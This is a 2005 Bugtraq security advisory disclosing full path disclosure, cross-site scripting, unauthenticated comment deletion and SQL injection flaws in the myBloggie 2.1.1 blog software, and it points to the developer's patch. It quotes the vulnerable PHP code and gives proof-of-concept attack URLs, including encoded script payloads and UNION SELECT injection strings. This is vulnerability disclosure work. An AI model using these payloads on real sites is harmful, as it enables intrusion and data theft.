Bugtraq mailing list archives
Multiple vulnerabilities in myBloggie 2.1.1
From: "Alberto Trivero" <trivero () jumpy it>
Date: Thu, 5 May 2005 16:46:17 +0200
****************************************************** * CODEBUG Labs * Advisory #9 * Title: Multiple vulnerabilities in myBloggie 2.1.1 * Authors: Alberto Trivero & CorryL * English Version: Alberto Trivero * Product: myBloggie 2.1.1 * Type: Multiple Vulnerabilities * Web: http://www.codebug.org/ ****************************************************** --) Software Page (mybloggie.mywebland.com) "myBloggie is considered one of the most simple, user-friendliest yet packed with features Weblog system available to date. Built using PHP & mySQL, web most popular scripting language & database system enable myBloggie to be installed in any webservers." --) Full Path Disclosure Thanks to an improper sanitization of the post_id parameter, it's possible to show the full path by sending a simple request: http://www.example.com/mybloggie/index.php?mode=viewid&post_id=' --) Cross-Site Scripting (XSS) Input passed to 'year' parameter in viewmode.php is not properly sanitised before being returned to users. This can be exploited execute arbitrary HTML and script code in a user's browser session in context of a vulnerable site with an URL like this: http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert (document.cookies)%3C/script%3E Frequently, when there is an SQL syntax error, MySQL, in the HTML page, report the value of the parameter that caused the error without sanitization. So it's possible tu inject HTML code in some parameter like these: http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72% 69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2 9%3C%2F%73%63%72%69%70%74%3EC http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63 %72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69% 65%29%3C%2F%73%63%72%69%70%74%3E http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72% 69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2 9%3C%2F%73%63%72%69%70%74%3E Note that this vulnerability it's only in part related to a iussue of the blog. --) Arbitrary Comment Deletion Let's look at code from delcomment.php at line 31: <? ... if (isset($_GET['comment_id'])) $comment_id = $_GET['comment_id']; if (isset($_GET['confirm'])) $confirm = $_GET['confirm']; if ($confirm=="") { message($lang['Confirm'], $lang['Msg_Del_error3']." <a class=\"std\" href=\"".$_SERVER['PHP_SELF']."?mode=delcom&comment_id=".$comment_id."&confi rm=yes\">".$lang['Yes']."</a>"); } elseif ($confirm=="yes") { // Data Base Connection // $sql = "DELETE FROM ".COMMENT_TBL." WHERE comment_id=$comment_id"; $result = $db->sql_query($sql); $confirm =""; message($lang['Del'], $lang['Msg_Del']); } else message( $lang['Error'],$lang['Msg_Del_error2'] ); ?> This piece of code has the task of delete a comment of a post. Normally this operation can be do only by the administrator by click on a specific link that the other users can't view. But this URL can be created by any user and myBloggie doesn't control if the user that send the request has the privileges to do it. So anyone can delete comments of others users specifing the comment id with this URL: http://www.example.com/mybloggie/index.php?mode=delcom&comment_id=[comment_i d]&confirm=yes --) SQL Injection Let's look at code from search.php at line 62: <? ... $sql = "SELECT COUNT(a.post_id) AS num_posts FROM " . POST_TBL . " a WHERE a.subject like '%".$keyword."%' OR a.message like '%".$keyword."%'" ; ... ?> When myBloggie get the value of the 'keyword' parameter and put it in the SQL query, don't sanitise it. So a remote user can do SQL injection attacks. This is a PoC URL: http://www.example.com/mybloggie/index.php?mode=search&keyword=trivero%'%20U NION%20SELECT%20null/* These are other PoC URLs for other parameters: http://www.example.com/mybloggie/index.php?month_no=1&year=1&mode=viewdate&d ate_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,nul l/* http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=1%20UNION%20S ELECT%20null,null,null,null,null,null,null,null,null,null/* http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1%20UNION %20SELECT%20null,null,null,null,null,null,null,null,null,null/* http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1&year=1% 20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/* http://www.example.com/mybloggie/index.php?mode=viewid&post_id=1%20UNION%20S ELECT%20null,null,null,null,null,null,null,null,null,null/* --) Patch After the report to developer of the blog of these bugs, he realesed the patches available at this address: http://mywebland.com/forums/viewtopic.php?t=180 ****************************************************** * http://www.codebug.org/ ******************************************************
Current thread:
- Multiple vulnerabilities in myBloggie 2.1.1 Alberto Trivero (May 05)